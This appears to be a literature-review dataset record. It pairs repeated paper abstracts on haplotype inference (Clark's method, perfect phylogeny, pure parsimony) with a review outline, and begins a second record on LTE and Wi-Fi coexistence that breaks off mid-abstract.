inferred by taking the remaining sequence after “subtracting off’ the sequencing ladder of each known site. Details of the algorithm for extracting allelic sequences from such data are presented here, along with some population-genetic considerations that influence the likelihood for success of the method. The algorithm also applies to the problem of inferring haplotype frequencies of closely linked restriction-site polymorphisms. --- paper_title: Inference of Haplotypes from Samples of Diploid Populations: Complexity and Algorithms paper_content: The next phase of human genomics will involve large-scale screens of populations for significant DNA polymorphisms, notably single nucleotide polymorphisms (SNPs). Dense human SNP maps are currently under construction. However, the utility of those maps and screens will be limited by the fact that humans are diploid and it is presently difficult to get separate data on the two "copies." Hence, genotype (blended) SNP data will be collected, and the desired haplotype (partitioned) data must then be (partially) inferred. A particular nondeterministic inference algorithm was proposed and studied by Clark (1990) and extensively used by Clark et al. (1998). In this paper, we more closely examine that inference method and the question of whether we can obtain an efficient, deterministic variant to optimize the obtained inferences. We show that the problem is NP-hard and, in fact, Max-SNP complete; that the reduction creates problem instances conforming to a severe restriction believed to hold in real data (Clark, 1990); and that even if we first use a natural exponential-time operation, the remaining optimization problem is NP-hard. However, we also develop, implement, and test an approach based on that operation and (integer) linear programming. The approach works quickly and correctly on simulated data. --- paper_title: Apolipoprotein E Variation at the Sequence Haplotype Level: Implications for the Origin and Maintenance of a Major Human Polymorphism paper_content: Three common protein isoforms of apolipoprotein E (apoE), encoded by the η2, η3, and η4 alleles of the APOE gene, differ in their association with cardiovascular and Alzheimer's disease risk. To gain a better understanding of the genetic variation underlying this important polymorphism, we identified sequence haplotype variation in 5.5 kb of genomic DNA encompassing the whole of the APOE locus and adjoining flanking regions in 96 individuals from four populations: blacks from Jackson, MS ( n =48 chromosomes), Mayans from Campeche, Mexico ( n =48), Finns from North Karelia, Finland ( n =48), and non-Hispanic whites from Rochester, MN ( n =48). In the region sequenced, 23 sites varied (21 single nucleotide polymorphisms, or SNPs, 1 diallelic indel, and 1 multiallelic indel). The 22 diallelic sites defined 31 distinct haplotypes in the sample. The estimate of nucleotide diversity (site-specific heterozygosity) for the locus was 0.0005±0.0003. Sequence analysis of the chimpanzee APOE gene showed that it was most closely related to human η4-type haplotypes, differing from the human consensus sequence at 67 synonymous (54 substitutions and 13 indels) and 9 nonsynonymous fixed positions. The evolutionary history of allelic divergence within humans was inferred from the pattern of haplotype relationships. This analysis suggests that haplotypes defining the η3 and η2 alleles are derived from the ancestral η4s and that the η3 group of haplotypes have increased in frequency, relative to η4s, in the past 200,000 years. Substantial heterogeneity exists within all three classes of sequence haplotypes, and there are important interpopulation differences in the sequence variation underlying the protein isoforms that may be relevant to interpreting conflicting reports of phenotypic associations with variation in the common protein isoforms. --- paper_title: Haplotype Structure and Population Genetic Inferences from Nucleotide-Sequence Variation in Human Lipoprotein Lipase paper_content: Summary Allelic variation in 9.7 kb of genomic DNA sequence from the human lipoprotein lipase gene ( LPL ) was scored in 71 healthy individuals (142 chromosomes) from three populations: African Americans (24) from Jackson, MS; Finns (24) from North Karelia, Finland; and non-Hispanic Whites (23) from Rochester, MN. The sequences had a total of 88 variable sites, with a nucleotide diversity (site-specific heterozygosity) of .002±.001 across this 9.7-kb region. The frequency spectrum of nucleotide variation exhibited a slight excess of heterozygosity, but, in general, the data fit expectations of the infinite-sites model of mutation and genetic drift. Allele-specific PCR helped resolve linkage phases, and a total of 88 distinct haplotypes were identified. For 1,410 (64%) of the 2,211 site pairs, all four possible gametes were present in these haplotypes, reflecting a rich history of past recombination. Despite the strong evidence for recombination, extensive linkage disequilibrium was observed. The number of haplotypes generally is much greater than the number expected under the infinite-sites model, but there was sufficient multisite linkage disequilibrium to reveal two major clades, which appear to be very old. Variation in this region of LPL may depart from the variation expected under a simple, neutral model, owing to complex historical patterns of population founding, drift, selection, and recombination. These data suggest that the design and interpretation of disease-association studies may not be as straightforward as often is assumed. --- paper_title: Bayesian Haplotype Inference for Multiple Linked Single-Nucleotide Polymorphisms paper_content: Haplotypes have gained increasing attention in the mapping of complex-disease genes, because of the abundance of single-nucleotide polymorphisms (SNPs) and the limited power of conventional single-locus analyses. It has been shown that haplotype-inference methods such as Clark's algorithm, the expectation-maximization algorithm, and a coalescence-based iterative-sampling algorithm are fairly effective and economical alternatives to molecular-haplotyping methods. To contend with some weaknesses of the existing algorithms, we propose a new Monte Carlo approach. In particular, we first partition the whole haplotype into smaller segments. Then, we use the Gibbs sampler both to construct the partial haplotypes of each segment and to assemble all the segments together. Our algorithm can accurately and rapidly infer haplotypes for a large number of linked SNPs. By using a wide variety of real and simulated data sets, we demonstrate the advantages of our Bayesian algorithm, and we show that it is robust to the violation of Hardy-Weinberg equilibrium, to the presence of missing data, and to occurrences of recombination hotspots. --- paper_title: Inference of haplotypes from PCR-amplified samples of diploid populations. paper_content: Direct sequencing of genomic DNA from diploid individuals leads to ambiguities on sequencing gels whenever there is more than one mismatching site in the sequences of the two orthologous copies of a gene. While these ambiguities cannot be resolved from a single sample without resorting to other experimental methods (such as cloning in the traditional way), population samples may be useful for inferring haplotypes. For each individual in the sample that is homozygous for the amplified sequence, there are no ambiguities in the identification of the allele’s sequence. The sequences of other alleles can be inferred by taking the remaining sequence after “subtracting off’ the sequencing ladder of each known site. Details of the algorithm for extracting allelic sequences from such data are presented here, along with some population-genetic considerations that influence the likelihood for success of the method. The algorithm also applies to the problem of inferring haplotype frequencies of closely linked restriction-site polymorphisms. --- paper_title: Inference of haplotypes from PCR-amplified samples of diploid populations. paper_content: Direct sequencing of genomic DNA from diploid individuals leads to ambiguities on sequencing gels whenever there is more than one mismatching site in the sequences of the two orthologous copies of a gene. While these ambiguities cannot be resolved from a single sample without resorting to other experimental methods (such as cloning in the traditional way), population samples may be useful for inferring haplotypes. For each individual in the sample that is homozygous for the amplified sequence, there are no ambiguities in the identification of the allele’s sequence. The sequences of other alleles can be inferred by taking the remaining sequence after “subtracting off’ the sequencing ladder of each known site. Details of the algorithm for extracting allelic sequences from such data are presented here, along with some population-genetic considerations that influence the likelihood for success of the method. The algorithm also applies to the problem of inferring haplotype frequencies of closely linked restriction-site polymorphisms. --- paper_title: Inference of Haplotypes from Samples of Diploid Populations: Complexity and Algorithms paper_content: The next phase of human genomics will involve large-scale screens of populations for significant DNA polymorphisms, notably single nucleotide polymorphisms (SNPs). Dense human SNP maps are currently under construction. However, the utility of those maps and screens will be limited by the fact that humans are diploid and it is presently difficult to get separate data on the two "copies." Hence, genotype (blended) SNP data will be collected, and the desired haplotype (partitioned) data must then be (partially) inferred. A particular nondeterministic inference algorithm was proposed and studied by Clark (1990) and extensively used by Clark et al. (1998). In this paper, we more closely examine that inference method and the question of whether we can obtain an efficient, deterministic variant to optimize the obtained inferences. We show that the problem is NP-hard and, in fact, Max-SNP complete; that the reduction creates problem instances conforming to a severe restriction believed to hold in real data (Clark, 1990); and that even if we first use a natural exponential-time operation, the remaining optimization problem is NP-hard. However, we also develop, implement, and test an approach based on that operation and (integer) linear programming. The approach works quickly and correctly on simulated data. --- paper_title: Inference of Haplotypes from Samples of Diploid Populations: Complexity and Algorithms paper_content: The next phase of human genomics will involve large-scale screens of populations for significant DNA polymorphisms, notably single nucleotide polymorphisms (SNPs). Dense human SNP maps are currently under construction. However, the utility of those maps and screens will be limited by the fact that humans are diploid and it is presently difficult to get separate data on the two "copies." Hence, genotype (blended) SNP data will be collected, and the desired haplotype (partitioned) data must then be (partially) inferred. A particular nondeterministic inference algorithm was proposed and studied by Clark (1990) and extensively used by Clark et al. (1998). In this paper, we more closely examine that inference method and the question of whether we can obtain an efficient, deterministic variant to optimize the obtained inferences. We show that the problem is NP-hard and, in fact, Max-SNP complete; that the reduction creates problem instances conforming to a severe restriction believed to hold in real data (Clark, 1990); and that even if we first use a natural exponential-time operation, the remaining optimization problem is NP-hard. However, we also develop, implement, and test an approach based on that operation and (integer) linear programming. The approach works quickly and correctly on simulated data. --- paper_title: Combinatorial Optimization: Algorithms and Complexity paper_content: This clearly written , mathematically rigorous text includes a novel algorithmic exposition of the simplex method and also discusses the Soviet ellipsoid algorithm for linear programming; efficient algorithms for network flow, matching, spanning trees, and matroids; the theory of NP-complete problems; approximation algorithms, local search heuristics for NPcomplete problems, more. All chapters are supplemented by thoughtprovoking problems. A useful work for graduate-level students with backgrounds in computer science, operations research, and electrical engineering. Mathematicians wishing a self-contained introduction need look no further.—American Mathematical Monthly. 1982 ed. --- paper_title: Inference of Haplotypes from Samples of Diploid Populations: Complexity and Algorithms paper_content: The next phase of human genomics will involve large-scale screens of populations for significant DNA polymorphisms, notably single nucleotide polymorphisms (SNPs). Dense human SNP maps are currently under construction. However, the utility of those maps and screens will be limited by the fact that humans are diploid and it is presently difficult to get separate data on the two "copies." Hence, genotype (blended) SNP data will be collected, and the desired haplotype (partitioned) data must then be (partially) inferred. A particular nondeterministic inference algorithm was proposed and studied by Clark (1990) and extensively used by Clark et al. (1998). In this paper, we more closely examine that inference method and the question of whether we can obtain an efficient, deterministic variant to optimize the obtained inferences. We show that the problem is NP-hard and, in fact, Max-SNP complete; that the reduction creates problem instances conforming to a severe restriction believed to hold in real data (Clark, 1990); and that even if we first use a natural exponential-time operation, the remaining optimization problem is NP-hard. However, we also develop, implement, and test an approach based on that operation and (integer) linear programming. The approach works quickly and correctly on simulated data. --- paper_title: Inference of haplotypes from PCR-amplified samples of diploid populations. paper_content: Direct sequencing of genomic DNA from diploid individuals leads to ambiguities on sequencing gels whenever there is more than one mismatching site in the sequences of the two orthologous copies of a gene. While these ambiguities cannot be resolved from a single sample without resorting to other experimental methods (such as cloning in the traditional way), population samples may be useful for inferring haplotypes. For each individual in the sample that is homozygous for the amplified sequence, there are no ambiguities in the identification of the allele’s sequence. The sequences of other alleles can be inferred by taking the remaining sequence after “subtracting off’ the sequencing ladder of each known site. Details of the algorithm for extracting allelic sequences from such data are presented here, along with some population-genetic considerations that influence the likelihood for success of the method. The algorithm also applies to the problem of inferring haplotype frequencies of closely linked restriction-site polymorphisms. --- paper_title: Inference of Haplotypes from Samples of Diploid Populations: Complexity and Algorithms paper_content: The next phase of human genomics will involve large-scale screens of populations for significant DNA polymorphisms, notably single nucleotide polymorphisms (SNPs). Dense human SNP maps are currently under construction. However, the utility of those maps and screens will be limited by the fact that humans are diploid and it is presently difficult to get separate data on the two "copies." Hence, genotype (blended) SNP data will be collected, and the desired haplotype (partitioned) data must then be (partially) inferred. A particular nondeterministic inference algorithm was proposed and studied by Clark (1990) and extensively used by Clark et al. (1998). In this paper, we more closely examine that inference method and the question of whether we can obtain an efficient, deterministic variant to optimize the obtained inferences. We show that the problem is NP-hard and, in fact, Max-SNP complete; that the reduction creates problem instances conforming to a severe restriction believed to hold in real data (Clark, 1990); and that even if we first use a natural exponential-time operation, the remaining optimization problem is NP-hard. However, we also develop, implement, and test an approach based on that operation and (integer) linear programming. The approach works quickly and correctly on simulated data. --- paper_title: Analysis and Exploration of the Use of Rule-Based Algorithms and Consensus Methods for the Inferral of Haplotypes paper_content: The difficulty of experimental determination of haplotypes from phase-unknown genotypes has stimulated the development of nonexperimental inferral methods. One well-known approach for a group of unrelated individuals involves using the trivially deducible haplotypes (those found in individuals with zero or one heterozygous sites) and a set of rules to infer the haplotypes underlying ambiguous genotypes (those with two or more heterozygous sites). Neither the manner in which this “rule-based” approach should be implemented nor the accuracy of this approach has been adequately assessed. We implemented eight variations of this approach that differed in how a reference list of haplotypes was derived and in the rules for the analysis of ambiguous genotypes. We assessed the accuracy of these variations by comparing predicted and experimentally determined haplotypes involving nine polymorphic sites in the human apolipoprotein E (APOE) locus. The eight variations resulted in substantial differences in the average number of correctly inferred haplotype pairs. More than one set of inferred haplotype pairs was found for each of the variations we analyzed, implying that the rule-based approach is not sufficient by itself for haplotype inferral, despite its appealing simplicity. Accordingly, we explored consensus methods in which multiple inferrals for a given ambiguous genotype are combined to generate a single inferral; we show that the set of these “consensus” inferrals for all ambiguous genotypes is more accurate than the typical single set of inferrals chosen at random. We also use a consensus prediction to divide ambiguous genotypes into those whose algorithmic inferral is certain or almost certain and those whose less certain inferral makes molecular inferral preferable. --- paper_title: An almost linear-time algorithm for graph realization paper_content: Given a {0, 1}-matrix M, the graph-realization problem for M is to find a tree T such that the columns of M are incidence vectors of paths in T, or to show that no such T exists. An algorithm is presented for this problem the time complexity of which is very nearly linear in the number of ones in M. --- paper_title: Perfect phylogeny haplotyper: haplotype inferral using a tree model paper_content: Summary: We have developed an efficient program, the Perfect Phylogeny Haplotyper (PPH) that takes in unphased population genotype data, and determines if that data can be explained by haplotype pairs that could have evolved on a perfect phylogeny. Availability: Executable code for four common platforms is available at: http://wwwcsif.cs.ucdavis.edu/∼gusfield --- paper_title: Haplotyping as perfect phylogeny: A direct approach paper_content: A full haplotype map of the human genome will prove extremely valuable as it will be used in large-scale screens of populations to associate specific haplotypes with specific complex genetic-influenced diseases. A haplotype map project has been announced by NIH. The biological key to that project is the surprising fact that some human genomic DNA can be partitioned into long blocks where genetic recombination has been rare, leading to strikingly fewer distinct haplotypes in the population than previously expected (Helmuth, 2001; Daly et al., 2001; Stephens et al., 2001; Friss et al., 2001). In this paper we explore the algorithmic implications of the no-recombination in long blocks observation, for the problem of inferring haplotypes in populations. This assumption, together with the standard population-genetic assumption of infinite sites, motivates a model of haplotype evolution where the haplotypes in a population are assumed to evolve along a coalescent, which as a rooted tree is a perfect phylogeny. We consider the following algorithmic problem, called the perfect phylogeny haplotyping problem (PPH), which was introduced by Gusfield (2002) - given n genotypes of length m each, does there exist a set of at most 2n haplotypes such that each genotype is generated by a pair of haplotypes from this set, and such that this set can be derived on a perfect phylogeny? The approach taken by Gusfield (2002) to solve this problem reduces it to established, deep results and algorithms from matroid and graph theory. Although that reduction is quite simple and the resulting algorithm nearly optimal in speed, taken as a whole that approach is quite involved, and in particular, challenging to program. Moreover, anyone wishing to fully establish, by reading existing literature, the correctness of the entire algorithm would need to read several deep and difficult papers in graph and matroid theory. However, as stated by Gusfield (2002), many simplifications are possible and the list of "future work" in Gusfield (2002) began with the task of developing a simpler, more direct, yet still efficient algorithm. This paper accomplishes that goal, for both the rooted and unrooted PPH problems. It establishes a simple, easy-to-program, O(nm(2))-time algorithm that determines whether there is a PPH solution for input genotypes and produces a linear-space data structure to represent all of the solutions. The approach allows complete, self-contained proofs. In addition to algorithmic simplicity, the approach here makes the representation of all solutions more intuitive than in Gusfield (2002), and solves another goal from that paper, namely, to prove a nontrivial upper bound on the number of PPH solutions, showing that that number is vastly smaller than the number of haplotype solutions (each solution being a set of n pairs of haplotypes that can generate the genotypes) when the perfect phylogeny requirement is not imposed. --- paper_title: Efficient reconstruction of haplotype structure via perfect phylogeny paper_content: Each person's genome contains two copies of each chromosome, one inherited from the father and the other from the mother. A person's genotype specifies the pair of bases at each site, but does not specify which base occurs on which chromosome. The sequence of each chromosome separately is called a haplotype. The determination of the haplotypes within a population is essential for understanding genetic variation and the inheritance of complex diseases. The haplotype mapping project, a successor to the human genome project, seeks to determine the common haplotypes in the human population. Since experimental determination of a person's genotype is less expensive than determining its component haplotypes, algorithms are required for computing haplotypes from genotypes. Two observations aid in this process: first, the human genome contains short blocks within which only a few different haplotypes occur; second, as suggested by Gusfield, it is reasonable to assume that the haplotypes observed within a block have evolved according to a perfect phylogeny, in which at most one mutation event has occurred at any site, and no recombination occurred at the given region. We present a simple and efficient polynomial-time algorithm for inferring haplotypes from the genotypes of a set of individuals assuming a perfect phylogeny. Using a reduction to 2-SAT we extend this algorithm to handle constraints that apply when we have genotypes from both parents and child. We also present a hardness result for the problem of removing the minimum number of individuals from a population to ensure that the genotypes of the remaining individuals are consistent with a perfect phylogeny. Our algorithms have been tested on real data and give biologically meaningful results. Our webserver (http://www.cs.columbia.edu/compbio/hap/) is publicly available for predicting haplotypes from genotype data and partitioning genotype data into blocks. --- paper_title: Inference of haplotypes from PCR-amplified samples of diploid populations. paper_content: Direct sequencing of genomic DNA from diploid individuals leads to ambiguities on sequencing gels whenever there is more than one mismatching site in the sequences of the two orthologous copies of a gene. While these ambiguities cannot be resolved from a single sample without resorting to other experimental methods (such as cloning in the traditional way), population samples may be useful for inferring haplotypes. For each individual in the sample that is homozygous for the amplified sequence, there are no ambiguities in the identification of the allele’s sequence. The sequences of other alleles can be inferred by taking the remaining sequence after “subtracting off’ the sequencing ladder of each known site. Details of the algorithm for extracting allelic sequences from such data are presented here, along with some population-genetic considerations that influence the likelihood for success of the method. The algorithm also applies to the problem of inferring haplotype frequencies of closely linked restriction-site polymorphisms. --- paper_title: Haplotyping Populations: Complexity and Approximations paper_content: We study the computational complexity of the following haplotyping problem. Given a set of genotypes G, find a minimum cardinality set of haplotypes which explains G. Here, a genotype g is an n-ary string over the alphabet {A,B,-} and an haplotype h is an n-ary string over the alphabet {A,B}. A set of haplotypes H is said to explain G if for every g in G there are h_1, h_2 in H such that h_1 + h_2 = g. The position-wise sum h_1 + h_2 indicates the genotype which has a '-' in the positions where h_1 and h_2 disagree, and the same value as h_1 and h_2 where they agree. We show the APX-hardness of the problem even in the case the number of '-' symbols is at most 3 for every g in G. We give a $\sqrt{|G|}$-approximation algorithm for the general case, and a $2^{k-1}$-approximation algorithm when the number of '-' symbols is at most k for every g in G. --- paper_title: Haplotype inference by pure Parsimony paper_content: The next high-priority phase of human genomics will involve the development and use of a full Haplotype Map of the human genome [7]. A critical, perhaps dominating, problem in all such efforts is the inference of large-scale SNP-haplotypes from raw genotype SNP data. This is called the Haplotype Inference (HI) problem. Abstractly, input to the HI problem is a set of n strings over a ternary alphabet. A solution is a set of at most 2n strings over the binary alphabet, so that each input string can be "generated" by some pair of the binary strings in the solution. For greatest biological fidelity, a solution should be consistent with, or evaluated by, properties derived from an appropriate genetic model. ::: ::: A natural model, that has been suggested repeatedly is called here the Pure Parsimony model, where the goal is to find a smallest set of binary strings that can generate the n input strings. The problem of finding such a smallest set is called the Pure Parsimony Problem. Unfortunately, the Pure Parsimony problem is NP-hard, and no paper has previously shown how an optimal Pure-parsimony solution can be computed efficiently for problem instances of the size of current biological interest. In this paper, we show how to formulate the Pure-parsimony problem as an integer linear program; we explain how to improve the practicality of the integer programming formulation; and we present the results of extensive experimentation we have done to show the time and memory practicality of the method, and to compare its accuracy against solutions found by the widely used general haplotyping program PHASE. We also formulate and experiment with variations of the Pure-Parsimony criteria, that allow greater practicality. The results are that the Pure Parsimony problem can be solved efficiently in practice for a wide range of problem instances of current interest in biology. Both the time needed for a solution, and the accuracy of the solution, depend on the level of recombination in the input strings. The speed of the solution improves with increasing recombination, but the accuracy of the solution decreases with increasing recombination. --- paper_title: Inference of Haplotypes from Samples of Diploid Populations: Complexity and Algorithms paper_content: The next phase of human genomics will involve large-scale screens of populations for significant DNA polymorphisms, notably single nucleotide polymorphisms (SNPs). Dense human SNP maps are currently under construction. However, the utility of those maps and screens will be limited by the fact that humans are diploid and it is presently difficult to get separate data on the two "copies." Hence, genotype (blended) SNP data will be collected, and the desired haplotype (partitioned) data must then be (partially) inferred. A particular nondeterministic inference algorithm was proposed and studied by Clark (1990) and extensively used by Clark et al. (1998). In this paper, we more closely examine that inference method and the question of whether we can obtain an efficient, deterministic variant to optimize the obtained inferences. We show that the problem is NP-hard and, in fact, Max-SNP complete; that the reduction creates problem instances conforming to a severe restriction believed to hold in real data (Clark, 1990); and that even if we first use a natural exponential-time operation, the remaining optimization problem is NP-hard. However, we also develop, implement, and test an approach based on that operation and (integer) linear programming. The approach works quickly and correctly on simulated data. --- paper_title: Bayesian Haplotype Inference for Multiple Linked Single-Nucleotide Polymorphisms paper_content: Haplotypes have gained increasing attention in the mapping of complex-disease genes, because of the abundance of single-nucleotide polymorphisms (SNPs) and the limited power of conventional single-locus analyses. It has been shown that haplotype-inference methods such as Clark's algorithm, the expectation-maximization algorithm, and a coalescence-based iterative-sampling algorithm are fairly effective and economical alternatives to molecular-haplotyping methods. To contend with some weaknesses of the existing algorithms, we propose a new Monte Carlo approach. In particular, we first partition the whole haplotype into smaller segments. Then, we use the Gibbs sampler both to construct the partial haplotypes of each segment and to assemble all the segments together. Our algorithm can accurately and rapidly infer haplotypes for a large number of linked SNPs. By using a wide variety of real and simulated data sets, we demonstrate the advantages of our Bayesian algorithm, and we show that it is robust to the violation of Hardy-Weinberg equilibrium, to the presence of missing data, and to occurrences of recombination hotspots. --- paper_title: Large scale reconstruction of haplotypes from genotype data paper_content: Critical to the understanding of the genetic basis for complex diseases is the modeling of human variation. Most of this variation can be characterized by single nucleotide polymorphisms (SNPs) which are mutations at a single nucleotide position. To characterize an individual's variation, we must determine an individual's haplotype or which nucleotide base occurs at each position of these common SNPs for each chromosome. In this paper, we present results for a highly accurate method for haplotype resolution from genotype data. Our method leverages a new insight into the underlying structure of haplotypes which shows that SNPs are organized in highly correlated "blocks". The majority of individuals have one of about four common haplotypes in each block. Our method partitions the SNPs into blocks and for each block, we predict the common haplotypes and each individual's haplotype. We evaluate our method over biological data. Our method predicts the common haplotypes perfectly and has a very low error rate (0.47%) when taking into account the predictions for the uncommon haplotypes. Our method is extremely efficient compared to previous methods, (a matter of seconds where previous methods needed hours). Its efficiency allows us to find the block partition of the haplotypes, to cope with missing data and to work with large data sets such as genotypes for thousands of SNPs for hundreds of individuals. The algorithm is available via webserver at http://www.cs.columbia.edu/compbio/hap. --- paper_title: Efficient reconstruction of phylogenetic networks with constrained recombination paper_content: A phylogenetic network is a generalization of a phylogenetic tree, allowing structural properties that are not treelike. With the growth of genomic data, much of which does not fit ideal tree models, there is greater need to understand the algorithmics and combinatorics of phylogenetic networks. We consider the problem of determining whether the sequences can be derived on a phylogenetic network where the recombination cycles are node disjoint. In this paper, we call such a phylogenetic network a "galled-tree". By more deeply analysing the combinatorial constraints on cycle-disjoint phylogenetic networks, we obtain an efficient algorithm that is guaranteed to be both a necessary and sufficient test for the existence of a galled-tree for the data. If there is a galled-tree, the algorithm constructs one and obtains an implicit representation of all the galled trees for the data, and can create these in linear time for each one. We also note two additional results related to galled trees: first, any set of sequences that can be derived on a galled tree can be derived on a true tree (without recombination cycles), where at most one back mutation is allowed per site; second, the site compatibility problem (which is NP-hard in general) can be solved in linear time for any set of sequences that can be derived on a galled tree. The combinatorial constraints we develop apply (for the most part) to node-disjoint cycles in any phylogenetic network (not just galled-trees), and can be used for example to prove that a given site cannot be on a node-disjoint cycle in any phylogenetic network. Perhaps more important than the specific results about galled-trees, we introduce an approach that can be used to study recombination in phylogenetic networks that go beyond galled-trees. ---
Title: An Overview of Combinatorial Methods for Haplotype Inference Section 1: Introduction to SNP's, Genotypes and Haplotypes Description 1: Introduce the basic biological concepts necessary for understanding haplotype inference, including SNPs, genotypes, and haplotypes. Section 2: The biological problem Description 2: Discuss the experimental challenges and motivations for distinguishing haplotypes from genotypes in genetic data. Section 3: The computational problem Description 3: Describe the computational challenge of inferring haplotypes from genotype data, including the ambiguity and complexity of possible solutions. Section 4: The need for a genetic model Description 4: Explain the importance of genetic models to guide algorithm development and validation for haplotype inference. Section 5: Optimizing Clark's method Description 5: Detail Clark's pioneering algorithm for haplotype inference and explore its mechanisms, strengths, and shortcomings. Section 6: The MR problem Description 6: Introduce the Maximum Resolution (MR) problem, which aims to maximize the number of resolved genotypes using Clark's method and its computational complexity. Section 7: A graph-theoretic view of the MR problem Description 7: Present a graph-theoretic approach to solving the MR problem, including the construction and analysis of the corresponding directed graph. Section 8: An Exact Integer Programming formulation for the MRG problem Description 8: Introduce an integer linear programming approach to accurately solve the MRG problem, detailing its constraints and formulations. Section 9: Results Description 9: Summarize the findings from simulations and experiments that validate the maximum-resolution hypothesis and its implications on haplotype accuracy. Section 10: Supercharging Clark's method Description 10: Discuss enhancements to Clark's method to improve accuracy, including multiple executions and selecting solutions with the fewest distinct haplotypes. Section 11: Perfect Phylogeny Description 11: Introduce the perfect phylogeny model for haplotype inference and its foundational principles in population genetics. Section 12: What happened to the genotype data? Description 12: Discuss the application of the perfect phylogeny model to real genotype data and how it helps in deducing haplotypes. Section 13: Algorithm and program GPPH Description 13: Detail the GPPH algorithm for solving the Perfect Phylogeny Haplotype (PPH) problem and its computational efficiency. Section 14: Algorithm and Program DPPH Description 14: Introduce the DPPH algorithm, an alternative method for solving the PPH problem with its own computational strategies. Section 15: Algorithm and program HPPH Description 15: Discuss the HPPH algorithm, a third approach for PPH problem, and compare its efficacy with GPPH and DPPH. Section 16: Comparing the execution of the programs Description 16: Compare the performance and accuracy of GPPH, DPPH, and HPPH programs, highlighting findings from empirical tests. Section 17: Uniqueness of the solution: a Strong phase transition Description 17: Examine the conditions under which unique PPH solutions are likely to occur, based on experimental results. Section 18: Handling haplotypes generated by some recombinations Description 18: Review the approach for dealing with recombination events in haplotype inference and the utility of maximal interval solutions. Section 19: Adding Recombination into the model Description 19: Explore the extension of the perfect phylogeny model to include recombination and the challenges of developing the Phylogenetic Network Haplotyping (PNH) Problem.
LTE and Wi−Fi Coexistence in Unlicensed Spectrum with Application to Smart Grid: A Review
11
--- paper_title: Modeling and Analyzing the Coexistence of Licensed-Assisted Access LTE and Wi-Fi paper_content: Licensed-assisted access (LAA) is a feature of Long-Term Evolution (LTE) which enables operation in the unlicensed spectrum. LAA guarantees fair coexistence with Wi-Fi by implementing the listen- before-talk (LBT) mechanism. In this paper, we leverage stochastic geometry to characterize key performance metrics of neighboring LAA and Wi-Fi networks. Our analysis is focused on a single unlicensed frequency band, where the locations for coexisting LTE eNodeBs (eNBs) and Wi-Fi access points (APs) are modeled as two independent homogeneous Poisson point processes (PPPs). Based on an analytical modeling of the channel access procedure, we have derived the medium access probability (MAP), the signal-to- interference-plus-noise ratio (SINR) distribution, the density of successful transmissions (DST), and the data rate distribution for both LAA and Wi-Fi. We show that compared to the baseline scenario where Wi-Fi coexists with an additional Wi-Fi network, LAA can improve the DST and data rate performance of Wi-Fi by adopting more sensitive clear channel assessment thresholds and/or larger contention window sizes. Meanwhile, LAA is demonstrated to achieve acceptable data rate performance despite using LBT. --- paper_title: Efficient Coexistence of LTE With WiFi in the Licensed and Unlicensed Spectrum Aggregation paper_content: The exploitation of unlicensed bands by the LTE-advanced (LTE-A) system has become a reality through the proposal of licensed assisted access (LAA) that relies on the carrier aggregation concept within the 3GPP framework. The efficient coexistence of LTE-A and WiFi in the unlicensed spectrum bands requires advanced intelligent techniques. This paper first investigates the concept of LAA, which consists of four main functionalities: 1) carrier selection (CS); 2) listen-before-talk; 3) discontinuous transmission (DTX); and 4) transmit power control (TPC). Second, the LAA functionality implementation is provided using an open source LTE-A downlink link level simulator. Third, we devise an enhanced learning technique for CS and DTX for efficient coexistence among LTE-A and WiFi users. In particular, we provide a Q-learning mechanism for the advanced learning of the unlicensed band activity resulting in the efficient coexistence. Finally, we enhance the coexistence further through a double Q-learning method as a proposal for CS that takes into account both DTX and TPC improving both LTE and WiFi performance. Simulation results are provided for all the use cases that reveal the benefit of exploiting unlicensed bands in next generation mobile cellular networks. --- paper_title: Coexistence of Wi-Fi and Heterogeneous Small Cell Networks Sharing Unlicensed Spectrum paper_content: As two major players in terrestrial wireless communications, Wi-Fi systems and cellular networks have different origins and have largely evolved separately. Motivated by the exponentially increasing wireless data demand, cellular networks are evolving towards a heterogeneous and small cell network architecture, wherein small cells are expected to provide very high capacity. However, due to the limited licensed spectrum for cellular networks, any effort to achieve capacity growth through network densification will face the challenge of severe inter-cell interference. In view of this, recent standardization developments have started to consider the opportunities for cellular networks to use the unlicensed spectrum bands, including the 2.4 GHz and 5 GHz bands that are currently used by Wi-Fi, Zigbee and some other communication systems. In this article, we look into the coexistence of Wi-Fi and 4G cellular networks sharing the unlicensed spectrum. We introduce a network architecture where small cells use the same unlicensed spectrum that Wi-Fi systems operate in without affecting the performance of Wi-Fi systems. We present an almost blank subframe (ABS) scheme without priority to mitigate the co-channel interference from small cells to Wi-Fi systems, and propose an interference avoidance scheme based on small cells estimating the density of nearby Wi-Fi access points to facilitate their coexistence while sharing the same unlicensed spectrum. Simulation results show that the proposed network architecture and interference avoidance schemes can significantly increase the capacity of 4G heterogeneous cellular networks while maintaining the service quality of Wi-Fi systems. --- paper_title: Experimental study of concurrent transmission in wireless sensor networks paper_content: We undertake a systematic experimental study of the effects of concurrent packet transmissions in low-power wireless networks. Our measurements, conducted with Mica2 motes equipped with CC1000 radios, confirm that guaranteeing successful packet reception with high probability in the presence of concurrent transmissions requires that the signal-to-interference-plus-noise-ratio (SINR) exceed a critical threshold. However, we find a significant variation of about 6 dB in the threshold for groups of radios operating at different transmission powers. We find that it is harder to estimate the level of interference in the presence of multiple interferers. We also find that the measured SINR threshold generally increases with the number of interferers. Our study offers a better understanding of concurrent transmissions and suggests richer interference models and useful guidelines to improve the design and analysis of higher layer protocols. --- paper_title: Licensed-assisted access for LTE in unlicensed spectrum: A MAC protocol design paper_content: Licensed-assisted access (LAA), which conveys data information via both licensed and unlicensed bands through spectrum aggregation, becomes a promising solution to enhance the capacity of wireless systems. In view of the potential impact on the incumbent system operating in unlicensed bands, the medium access control (MAC) protocol design for LAA system to harmonically coexist with its neighboring incumbent users is one of the most critical and challenging issues. In this paper, we consider a long-term evolution-based LAA (LAA-LTE) system operating in the WiFi unlicensed spectrum, for which the listen-before-talk-based MAC protocol is carefully designed. By quantifying the WiFi throughput and packet delay in the coexisting system, we formulate the constraints of LAA-LTE transmission time to fairly maintain WiFi services. The conditions of known and unknown network size of incumbent WiFi system are each considered separately. Then, the feasible region of LAA-LTE transmission time is determined, and the LAA-LTE protocol is optimized for maximizing the LAA-LTE throughput or the overall throughput contributed by both LAA-LTE and WiFi system. The theoretical analysis is validated via simulation, which also illustrates important observations when LAA-LTE and WiFi systems coexist. This paper offers guidelines to design the LAA-LTE system, paving the way to a controllable, not only harmonious, coexistence of LAA-LTE and WiFi systems in the unlicensed spectrum. --- paper_title: A SURVEY OF LTE WI-FI COEXISTENCE IN UNLICENSED BANDS paper_content: With the rapid growth of mobile 